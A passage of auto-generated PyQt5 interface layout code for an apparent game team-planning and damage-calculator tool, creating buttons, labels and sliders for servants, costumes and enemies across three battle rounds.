sizePolicy.setHeightForWidth(self.label_costume_state_2.sizePolicy().hasHeightForWidth())
self.label_costume_state_2.setSizePolicy(sizePolicy)
self.label_costume_state_2.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_2.setObjectName("label_costume_state_2")
self.gridLayout_3.addWidget(self.label_costume_state_2, 4, 1, 1, 1)
self.horizontalLayout_28 = QtWidgets.QHBoxLayout()
self.horizontalLayout_28.setObjectName("horizontalLayout_28")
self.btn_select_servant_4 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_4.sizePolicy().hasHeightForWidth())
self.btn_select_servant_4.setSizePolicy(sizePolicy)
self.btn_select_servant_4.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setText("")
self.btn_select_servant_4.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setObjectName("btn_select_servant_4")
self.horizontalLayout_28.addWidget(self.btn_select_servant_4)
self.gridLayout_3.addLayout(self.horizontalLayout_28, 0, 4, 1, 1)
self.horizontalLayout_36 = QtWidgets.QHBoxLayout()
self.horizontalLayout_36.setObjectName("horizontalLayout_36")
self.btn_select_costume_2 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_2.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_2.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_2.setText("")
self.btn_select_costume_2.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_2.setObjectName("btn_select_costume_2")
self.horizontalLayout_36.addWidget(self.btn_select_costume_2)
self.gridLayout_3.addLayout(self.horizontalLayout_36, 3, 1, 1, 1)
self.horizontalLayout_46 = QtWidgets.QHBoxLayout()
self.horizontalLayout_46.setObjectName("horizontalLayout_46")
self.btn_select_costume_1 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_costume_1.sizePolicy().hasHeightForWidth())
self.btn_select_costume_1.setSizePolicy(sizePolicy)
self.btn_select_costume_1.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_1.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_1.setText("")
self.btn_select_costume_1.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_1.setObjectName("btn_select_costume_1")
self.horizontalLayout_46.addWidget(self.btn_select_costume_1)
self.gridLayout_3.addLayout(self.horizontalLayout_46, 3, 0, 1, 1)
self.label_servant_state_3 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_3.sizePolicy().hasHeightForWidth())
self.label_servant_state_3.setSizePolicy(sizePolicy)
self.label_servant_state_3.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_3.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_3.setObjectName("label_servant_state_3")
self.gridLayout_3.addWidget(self.label_servant_state_3, 2, 2, 1, 1)
self.label_servant_state_5 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_5.sizePolicy().hasHeightForWidth())
self.label_servant_state_5.setSizePolicy(sizePolicy)
self.label_servant_state_5.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_5.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_5.setObjectName("label_servant_state_5")
self.gridLayout_3.addWidget(self.label_servant_state_5, 2, 5, 1, 1)
self.horizontalLayout_44 = QtWidgets.QHBoxLayout()
self.horizontalLayout_44.setObjectName("horizontalLayout_44")
self.btn_select_costume_6 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_6.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_6.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_6.setText("")
self.btn_select_costume_6.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_6.setObjectName("btn_select_costume_6")
self.horizontalLayout_44.addWidget(self.btn_select_costume_6)
self.gridLayout_3.addLayout(self.horizontalLayout_44, 3, 6, 1, 1)
self.horizontalLayout_27 = QtWidgets.QHBoxLayout()
self.horizontalLayout_27.setObjectName("horizontalLayout_27")
self.btn_select_servant_3 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_3.sizePolicy().hasHeightForWidth())
self.btn_select_servant_3.setSizePolicy(sizePolicy)
self.btn_select_servant_3.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setText("")
self.btn_select_servant_3.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setObjectName("btn_select_servant_3")
self.horizontalLayout_27.addWidget(self.btn_select_servant_3)
self.gridLayout_3.addLayout(self.horizontalLayout_27, 0, 2, 1, 1)
self.label_costume_state_3 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_3.sizePolicy().hasHeightForWidth())
self.label_costume_state_3.setSizePolicy(sizePolicy)
self.label_costume_state_3.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_3.setObjectName("label_costume_state_3")
self.gridLayout_3.addWidget(self.label_costume_state_3, 4, 2, 1, 1)
self.label_servant_state_4 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_4.sizePolicy().hasHeightForWidth())
self.label_servant_state_4.setSizePolicy(sizePolicy)
self.label_servant_state_4.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_4.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_4.setObjectName("label_servant_state_4")
self.gridLayout_3.addWidget(self.label_servant_state_4, 2, 4, 1, 1)
self.line_8 = QtWidgets.QFrame(self.groupBox)
self.line_8.setFrameShape(QtWidgets.QFrame.VLine)
self.line_8.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_8.setObjectName("line_8")
self.gridLayout_3.addWidget(self.line_8, 3, 7, 1, 1)
self.horizontalLayout_40 = QtWidgets.QHBoxLayout()
self.horizontalLayout_40.setObjectName("horizontalLayout_40")
self.btn_select_costume_4 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_4.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_4.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_4.setText("")
self.btn_select_costume_4.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_4.setObjectName("btn_select_costume_4")
self.horizontalLayout_40.addWidget(self.btn_select_costume_4)
self.gridLayout_3.addLayout(self.horizontalLayout_40, 3, 4, 1, 1)
self.label_servant_state_6 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_6.sizePolicy().hasHeightForWidth())
self.label_servant_state_6.setSizePolicy(sizePolicy)
self.label_servant_state_6.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_6.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_6.setObjectName("label_servant_state_6")
self.gridLayout_3.addWidget(self.label_servant_state_6, 2, 6, 1, 1)
self.line_3 = QtWidgets.QFrame(self.groupBox)
self.line_3.setFrameShape(QtWidgets.QFrame.VLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.gridLayout_3.addWidget(self.line_3, 0, 3, 1, 1)
self.horizontalLayout_42 = QtWidgets.QHBoxLayout()
self.horizontalLayout_42.setObjectName("horizontalLayout_42")
self.btn_select_costume_5 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_5.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_5.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_5.setText("")
self.btn_select_costume_5.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_5.setObjectName("btn_select_costume_5")
self.horizontalLayout_42.addWidget(self.btn_select_costume_5)
self.gridLayout_3.addLayout(self.horizontalLayout_42, 3, 5, 1, 1)
self.horizontalLayout_30 = QtWidgets.QHBoxLayout()
self.horizontalLayout_30.setObjectName("horizontalLayout_30")
self.btn_select_servant_6 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_6.sizePolicy().hasHeightForWidth())
self.btn_select_servant_6.setSizePolicy(sizePolicy)
self.btn_select_servant_6.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setText("")
self.btn_select_servant_6.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setObjectName("btn_select_servant_6")
self.horizontalLayout_30.addWidget(self.btn_select_servant_6)
self.gridLayout_3.addLayout(self.horizontalLayout_30, 0, 6, 1, 1)
self.line_4 = QtWidgets.QFrame(self.groupBox)
self.line_4.setFrameShape(QtWidgets.QFrame.VLine)
self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_4.setObjectName("line_4")
self.gridLayout_3.addWidget(self.line_4, 3, 3, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout_3)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btn_set_progress = QtWidgets.QPushButton(self.groupBox)
self.btn_set_progress.setObjectName("btn_set_progress")
self.horizontalLayout_4.addWidget(self.btn_set_progress)
self.btn_choose_level = QtWidgets.QPushButton(self.groupBox)
self.btn_choose_level.setObjectName("btn_choose_level")
self.horizontalLayout_4.addWidget(self.btn_choose_level)
self.btn_confirm_team = QtWidgets.QPushButton(self.groupBox)
self.btn_confirm_team.setObjectName("btn_confirm_team")
self.horizontalLayout_4.addWidget(self.btn_confirm_team)
self.btn_change_team = QtWidgets.QPushButton(self.groupBox)
self.btn_change_team.setEnabled(False)
self.btn_change_team.setObjectName("btn_change_team")
self.horizontalLayout_4.addWidget(self.btn_change_team)
self.btn_round_reset = QtWidgets.QPushButton(self.groupBox)
self.btn_round_reset.setEnabled(False)
self.btn_round_reset.setObjectName("btn_round_reset")
self.horizontalLayout_4.addWidget(self.btn_round_reset)
self.verticalLayout_3.addLayout(self.horizontalLayout_4)
self.verticalLayout_2.addWidget(self.groupBox)
self.horizontalLayout_15 = QtWidgets.QHBoxLayout()
self.horizontalLayout_15.setObjectName("horizontalLayout_15")
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_2.setTitle("")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_6.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_6.setSpacing(5)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.gridLayout_7 = QtWidgets.QGridLayout()
self.gridLayout_7.setObjectName("gridLayout_7")
self.round1_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy3_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy3_class.setText("")
self.round1_enemy3_class.setObjectName("round1_enemy3_class")
self.gridLayout_7.addWidget(self.round1_enemy3_class, 1, 0, 1, 1)
self.round3_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy1_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy1_class.setText("")
self.round3_enemy1_class.setObjectName("round3_enemy1_class")
self.gridLayout_7.addWidget(self.round3_enemy1_class, 7, 2, 1, 1)
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.round2_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy1_pic.setEnabled(False)
self.round2_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setText("")
self.round2_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setObjectName("round2_enemy1_pic")
self.horizontalLayout_10.addWidget(self.round2_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_10, 3, 2, 1, 1)
self.round3_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy1_health.setText("")
self.round3_enemy1_health.setObjectName("round3_enemy1_health")
self.gridLayout_7.addWidget(self.round3_enemy1_health, 8, 2, 1, 1)
self.horizontalLayout_20 = QtWidgets.QHBoxLayout()
self.horizontalLayout_20.setObjectName("horizontalLayout_20")
self.round3_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy2_pic.setEnabled(False)
self.round3_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setText("")
self.round3_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setObjectName("round3_enemy2_pic")
self.horizontalLayout_20.addWidget(self.round3_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_20, 6, 1, 1, 1)
self.round2_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy3_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy3_class.setText("")
self.round2_enemy3_class.setObjectName("round2_enemy3_class")
self.gridLayout_7.addWidget(self.round2_enemy3_class, 4, 0, 1, 1)
self.round2_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy2_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy2_class.setText("")
self.round2_enemy2_class.setObjectName("round2_enemy2_class")
self.gridLayout_7.addWidget(self.round2_enemy2_class, 4, 1, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.round2_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy3_pic.setEnabled(False)
self.round2_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setText("")
self.round2_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setObjectName("round2_enemy3_pic")
self.horizontalLayout_6.addWidget(self.round2_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_6, 3, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.round2_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy2_pic.setEnabled(False)
self.round2_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setText("")
self.round2_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setObjectName("round2_enemy2_pic")
self.horizontalLayout_7.addWidget(self.round2_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_7, 3, 1, 1, 1)
self.horizontalLayout_21 = QtWidgets.QHBoxLayout()
self.horizontalLayout_21.setObjectName("horizontalLayout_21")
self.round3_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy3_pic.setEnabled(False)
self.round3_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setText("")
self.round3_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setObjectName("round3_enemy3_pic")
self.horizontalLayout_21.addWidget(self.round3_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_21, 6, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.round1_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy2_pic.setEnabled(False)
self.round1_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setText("")
self.round1_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setObjectName("round1_enemy2_pic")
self.horizontalLayout_2.addWidget(self.round1_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_2, 0, 1, 1, 1)
self.round3_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy3_class.setMaximumSize(QtCore.QSize(150, 28))
self.round3_enemy3_class.setText("")
self.round3_enemy3_class.setObjectName("round3_enemy3_class")
self.gridLayout_7.addWidget(self.round3_enemy3_class, 7, 0, 1, 1)
self.round1_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy2_class.setMaximumSize(QtCore.QSize(150, 28))
self.round1_enemy2_class.setText("")
self.round1_enemy2_class.setObjectName("round1_enemy2_class")
self.gridLayout_7.addWidget(self.round1_enemy2_class, 1, 1, 1, 1)
self.round3_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy3_health.setText("")
self.round3_enemy3_health.setObjectName("round3_enemy3_health")
self.gridLayout_7.addWidget(self.round3_enemy3_health, 8, 0, 1, 1)
self.round1_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy3_health.setText("")
self.round1_enemy3_health.setObjectName("round1_enemy3_health")
self.gridLayout_7.addWidget(self.round1_enemy3_health, 2, 0, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.round1_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy1_pic.setEnabled(False)
self.round1_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setText("")
self.round1_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy1_pic.setObjectName("round1_enemy1_pic")
self.horizontalLayout.addWidget(self.round1_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout, 0, 2, 1, 1)
self.round2_enemy3_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy3_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy3_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy3_health.setText("")
self.round2_enemy3_health.setObjectName("round2_enemy3_health")
self.gridLayout_7.addWidget(self.round2_enemy3_health, 5, 0, 1, 1)
self.round2_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy2_health.setText("")
self.round2_enemy2_health.setObjectName("round2_enemy2_health")
self.gridLayout_7.addWidget(self.round2_enemy2_health, 5, 1, 1, 1)
self.round3_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy2_health.setText("")
self.round3_enemy2_health.setObjectName("round3_enemy2_health")
self.gridLayout_7.addWidget(self.round3_enemy2_health, 8, 1, 1, 1)
self.round1_enemy2_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy2_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy2_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy2_health.setText("")
self.round1_enemy2_health.setObjectName("round1_enemy2_health")
self.gridLayout_7.addWidget(self.round1_enemy2_health, 2, 1, 1, 1)
self.round2_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy1_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy1_class.setText("")
self.round2_enemy1_class.setObjectName("round2_enemy1_class")
self.gridLayout_7.addWidget(self.round2_enemy1_class, 4, 2, 1, 1)
self.round1_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy1_class.setMaximumSize(QtCore.QSize(150, 28))
self.round1_enemy1_class.setText("")
self.round1_enemy1_class.setObjectName("round1_enemy1_class")
self.gridLayout_7.addWidget(self.round1_enemy1_class, 1, 2, 1, 1)
self.round1_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy1_health.setText("")
self.round1_enemy1_health.setObjectName("round1_enemy1_health")
self.gridLayout_7.addWidget(self.round1_enemy1_health, 2, 2, 1, 1)
self.round2_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy1_health.setText("")
self.round2_enemy1_health.setObjectName("round2_enemy1_health")
self.gridLayout_7.addWidget(self.round2_enemy1_health, 5, 2, 1, 1)
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.round3_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy1_pic.setEnabled(False)
self.round3_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setText("")
self.round3_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy1_pic.setObjectName("round3_enemy1_pic")
self.horizontalLayout_12.addWidget(self.round3_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_12, 6, 2, 1, 1)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.round1_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy3_pic.setEnabled(False)
self.round1_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setText("")
self.round1_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy3_pic.setObjectName("round1_enemy3_pic")
self.horizontalLayout_5.addWidget(self.round1_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_5, 0, 0, 1, 1)
self.round3_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy2_class.setMaximumSize(QtCore.QSize(150, 28))
self.round3_enemy2_class.setText("")
self.round3_enemy2_class.setObjectName("round3_enemy2_class")
self.gridLayout_7.addWidget(self.round3_enemy2_class, 7, 1, 1, 1)
self.verticalLayout_4.addLayout(self.gridLayout_7)
self.verticalLayout_6.addLayout(self.verticalLayout_4)
self.horizontalLayout_15.addWidget(self.groupBox_2)
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
self.groupBox_3.setTitle("")
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_7.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_7.setSpacing(5)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.round1_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round1_label_random.setEnabled(False)
self.round1_label_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round1_label_random.setObjectName("round1_label_random")
self.verticalLayout_5.addWidget(self.round1_label_random)
self.round1_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round1_bar_random.setEnabled(False)
self.round1_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round1_bar_random.setMinimum(90)
self.round1_bar_random.setMaximum(110)
self.round1_bar_random.setProperty("value", 90)
self.round1_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round1_bar_random.setObjectName("round1_bar_random")
self.verticalLayout_5.addWidget(self.round1_bar_random)
self.gridLayout_2.addLayout(self.verticalLayout_5, 1, 8, 1, 1)
self.round1_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_np.setEnabled(False)
self.round1_servant2_np.setObjectName("round1_servant2_np")
self.gridLayout_2.addWidget(self.round1_servant2_np, 4, 5, 1, 1)
self.round1_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_np.setEnabled(False)
self.round1_servant3_np.setObjectName("round1_servant3_np")
self.gridLayout_2.addWidget(self.round1_servant3_np, 4, 6, 1, 1)
self.horizontalLayout_16 = QtWidgets.QHBoxLayout()
self.horizontalLayout_16.setObjectName("horizontalLayout_16")
self.round1_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_pic.setEnabled(False)
self.round1_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setText("")
self.round1_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant2_pic.setObjectName("round1_servant2_pic")
self.horizontalLayout_16.addWidget(self.round1_servant2_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_16, 1, 5, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.round1_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_pic.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.round1_servant1_pic.sizePolicy().hasHeightForWidth())
self.round1_servant1_pic.setSizePolicy(sizePolicy)
self.round1_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setText("")
self.round1_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant1_pic.setObjectName("round1_servant1_pic")
self.horizontalLayout_9.addWidget(self.round1_servant1_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_9, 1, 4, 1, 1)
